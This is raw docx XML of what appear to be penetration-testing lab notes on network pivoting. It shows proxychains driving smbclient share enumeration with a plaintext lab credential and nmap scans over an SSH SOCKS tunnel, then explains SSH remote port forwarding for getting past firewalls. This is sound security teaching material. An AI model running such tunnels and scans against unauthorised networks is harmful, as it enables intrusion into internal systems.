    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000089B">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000089C">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">With Proxychains properly configured, we can use smbclient from our Kali machine to enumerate available shares on HRSHARES.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000089D">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can simply prepend </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">proxychains</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the command. Proxychains will read the configuration file, hook into the smbclient process, and force all traffic through the SOCKS proxy we specified.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000089E">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can now write commands targeting the HRSHARES IP directly, not CONFLUENCE01 or PGDATBASE01. This is because we are writing the commands as if we have are PGDATABASE01 (the SSH Server)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000089F">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">proxychains smbclient -L //172.16.50.217/ -U hr_admin --password=Welcome1234</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008A0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1252"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Rather than connecting to the port on CONFLUENCE01, we'll write the smbclient command as though we have a direct connection to PGDATABASE01</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1252"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">172.16.50.217</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> belongs to HRSHARES, the target machine in the INTERNAL Subnet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008A2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1252"/>
        </w:numPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As before, we will specify </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-L</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to list the available shares, pass the username with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-U</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and password with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>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A3">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008A4">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">INFO: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Although we specify socks5 in this example, it could also be socks4, since SSH supports both. SOCKS5 supports authentication, IPv6, and User Datagram Protocol (UDP), including DNS. Some SOCKS proxies will only support the SOCKS4 protocol. Make sure you check which version is supported by the SOCKS server when using SOCKS proxies in engagements.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008A5">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008A6">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How does a proxy work?:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="249"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sending traffic to the proxy (not directly to the final destination)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008A8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="249"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The proxy then forwards that traffic to the actual target</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="249"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The response comes back through the proxy, and then to you</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="249"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So your machine only ever talks to the proxy, and the proxy does the rest.</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Another example, this time with nmap:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008AD">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo proxychains nmap -vvv -sT --top-ports=20 -Pn 172.16.50.217</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008AE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Again, we specify </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">172.16.50.217</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> which is the IP of the target machine HRSHARES</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008AF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We must specify</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -sT </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to perform a TCP connect scan. Otherwise, Nmap will not work over Proxychains.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008B0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And we use the proxychains command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008B1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And since we can access multiple ports using dynamic port forwarding, we can do a full NMAP scan allowing us to look at multiple ports. Local and remote port forwarding can't do this</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t xml:space="preserve">Note:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1126"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can scan multiple IP with one nmap command, like below:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1126"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo proxychains -q nmap -sT -oN nmap_servers -Pn -p 21,80,443 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">172.16.6.240 172.16.6.241 172.16.6.254</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By default, Proxychains is configured with very high time-out values. This can make port scanning really slow. Lowering the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tcp_read_time_out</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tcp_connect_time_out</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> values in the Proxychains configuration file will force Proxychains to time-out on non-responsive connections more quickly. This can dramatically speed up port-scanning times.</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A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_or6cpmccgvk2" w:id="79"/>
      <w:bookmarkEnd w:id="79"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH Remote Port Forwarding</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008BB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1790700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="471" name="image466.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image466.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId191"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="179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TLDR: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008BE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="849"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Setup:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> We set up SSH Client on Middleman (CONFLUENCE01) and SSH Server on Kali, so we run SSH on Middleman. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="849"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Outcome: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On our Kali, our commands specify localhost/loopback and a specific port, which gets pushed by the SSH server software back to the SSH client (Middleman). And this gets through the firewall since we are using the same SSH tunnel. This then gets forwarded by the SSH client to the specific single port of a target machine </w:t>
      </w:r>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t xml:space="preserve">Inbound traffic is often blocked. Only in rare cases will we compromise credentials for an SSH user, allowing us to SSH directly into a network and port forward. We will only very rarely be able to access ports that we bind to a network perimeter.</w:t>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r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">However, we will more often be able to SSH out of a network. Outbound connections are more difficult to control than inbound connections. Most corporate networks will allow many types of common network traffic out - including SSH - for reasons of simplicity, usability, and business need. So, while it likely won't be possible to connect to a port we bind to the network perimeter, it will often be possible to SSH out.</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This is where </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH remote port forwarding </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">can be extremely useful. In a similar way that an attacker may execute a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">remote shell payload to connect back to an attacker-controlled listener (reverse shell)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, SSH remote port forwarding can be used to connect back to an attacker-controlled SSH server and bind the listening port there. W</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">e can think of it like a reverse shell, but for port forwarding</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> local and dynamic port forwarding</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH Client Listens</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH Server forwards packet</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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">remote port forwarding</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH Server Listens</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH Client forwards packet</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ind w:left="-810" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="7205652" cy="2178453"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="270" name="image266.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image266.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId191"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7205652" cy="21784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D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1134"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We now have a firewall that allows all outbound and only TCP/8090 inbound.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000008CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
